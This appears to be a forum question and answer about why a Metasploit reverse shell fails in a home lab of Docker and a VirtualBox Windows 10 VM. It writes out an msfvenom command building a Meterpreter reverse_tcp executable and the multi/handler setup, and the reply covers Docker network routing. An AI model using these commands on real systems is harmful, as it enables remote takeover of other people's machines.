I am running metasploit on docker from: remnux/metasploit and I want to open a reverse shell on a virtual machine running windows 10 in virtual box. The docker container and the vm run on the same host machine with ip: 192.168.10.1
sudo docker run --rm -it -p 8080:8080 -v ~/.msf4:/root/.msf4 -v /tmp/msf:/tmp/data remnux/metasploit
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 LHOST=192.168.10.1 LPORT=8080 -f exe -o file.exe
And fire up msfconsole:
msfconsole msf > use multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LPORT 8080 LPORT => 8080 msf exploit(handler) > set LHOST 192.168.10.1 LHOST => 192.168.10.1 msf exploit(handler) > exploit [-] Handler failed to bind to 192.168.10.1:8080:- - [*] Started reverse TCP handler on 0.0.0.0:8080 [*] Starting the payload handler...
Finally I open up file.exe on the windows10 machine and nothing happens. I checked that port 8080 was open on the host machine and that the vm could ping the host machine at 192.168.10.1
My virtualbox network configuration is set to bridged adapter.
Moreover I have no antivirus running on this vm and windows defender is down.
Does anyone have any idea to why this is not working? Thank you in advance.
From my understanding you have the following:
docker inspect <container id>)
Since you are running metasploit from 172.17.0.x you should instead set
This should work because the docker engine sets up a route on your host to direct traffic from 172.17.x.x to docker0 bridge
You might have to set this route in your local network router as well (172.17.x.x to 192.168.10.1)... because its possible your VM is not using your Host computer as a gateway ... and is instead talking to your actual network gateway (depends on how your VM is setup).